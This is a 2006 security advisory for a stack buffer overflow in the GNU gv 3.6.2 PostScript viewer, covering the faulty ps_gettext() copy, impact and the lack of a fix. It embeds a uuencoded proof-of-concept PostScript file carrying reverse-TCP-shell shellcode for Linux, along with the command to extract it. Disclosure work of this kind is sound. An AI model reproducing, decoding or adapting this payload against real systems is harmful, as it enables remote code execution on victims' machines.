gnugv362.txt

`GNU gv Stack Overflow Vulnerability  
  
  
//----- Advisory  
  
  
Program : GNU gv  
Homepage : http://www.gnu.org/software/gv/  
Tested version : 3.6.2  
Found by : r.lifchitz at sysdream dot com  
This advisory : r.lifchitz at sysdream dot com  
Discovery date : 2006/11/06  
Vendor notified : 2006/11/09  
  
  
//----- Application description  
  
  
gv is a comfortable viewer of PostScript and PDF files for the X  
Window System. It uses the ghostscript PostScript interpreter  
and is based on the classic X front-end for gs, ghostview, which  
it has replaced now.  
  
  
//----- Description of vulnerability  
  
  
The 'gv' viewer is prone to a remote stack overflow  
vulnerability. This issue exists because the application fails  
to perform proper boundary checks before copying user-supplied  
data into process buffers. A remote attacker may execute arbitrary  
code in the context of a user running the application. As a result,  
the attacker can gain unauthorized access to the vulnerable computer.  
  
This issue is present itself in the 'ps_gettext()' function residing  
in the 'ps.c' file.  
  
Long comments in some specific headers (such as '%%DocumentMedia:')  
of PS files are unconditionally copied into 'text', a 257 character  
buffer on the stack.  
  
This issue is reported to affect gv 3.6.2, but earlier versions are  
likely prone to this vulnerability as well. Applications using embedded  
gv code may also be vulnerable.  
  
  
//----- Proof Of Concept  
  
  
* Linux IA32 Reverse TCP Shell on 192.168.110.247:4321 (uuencoded  
exploit) :  
  
begin 644 hello-reverseshell.ps  
M)2%04RU!9&]B92TS+C`*)254:71L93H@:&5L;&\N<',*)25&;W(Z(%)E;F%U  
M9"!,:69C:&ET>B`M(%-Y<V1R96%M("T@:'1T<#HO+W=W=RYS>7-D<F5A;2YC  
M;VTO"B4E0F]U;F1I;F=";W@Z(#(T(#(T(#4X."`W-C@*)25$;V-U;65N=$UE  
M9&EA.B"0D)"0D)"0D#')@^GNV>[9="3T6X%S$](GKN*#Z_SB]./\_:&!3:R(  
MM'\G`Q^G/;MB&&-BFUY7N8A/;DJ\T,B*PL;MA(&N3U*T=_^Q6\;M+U)UQLW]  
M5,:*_47'C%O$_+%;QA[I'Z>NXD%!04%!04%!04%!04%!04%!04%!04%!04%!  
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!  
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!  
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!  
M04%!04%!04'OO`0(04%!(#8Q,B`W.3(@,"`H*2`H*0HE)41O8W5M96YT1&%T  
M83H@0VQE86XW0FET"B4E3W)I96YT871I;VXZ($QA;F1S8V%P90HE)5!A9V5S  
M.B`Q"B4E4&%G94]R9&5R.B!!<V-E;F0*)24K(&5N8V]D:6YG($E33RTX.#4Y  
9+3%%;F-O9&EN9PHE)45N9$-O;6UE;G1S"@``  
`  
end  
  
  
Use:  
$ uudecode < this-advisory.txt  
to extract the exploit.  
  
  
//----- Solution  
  
  
No known solution. You have to wait for a vendor upgrade and  
be careful with unknown PS files.  
  
  
//----- Impact  
  
  
Successful exploitation leads to remote code execution.  
  
  
//----- Credits  
  
  
Renaud Lifchitz  
r.lifchitz at sysdream dot com  
http://www.sysdream.com/  
  
  
//----- Greetings  
  
  
Thanks to Ali Rahbar  
  
  
  
`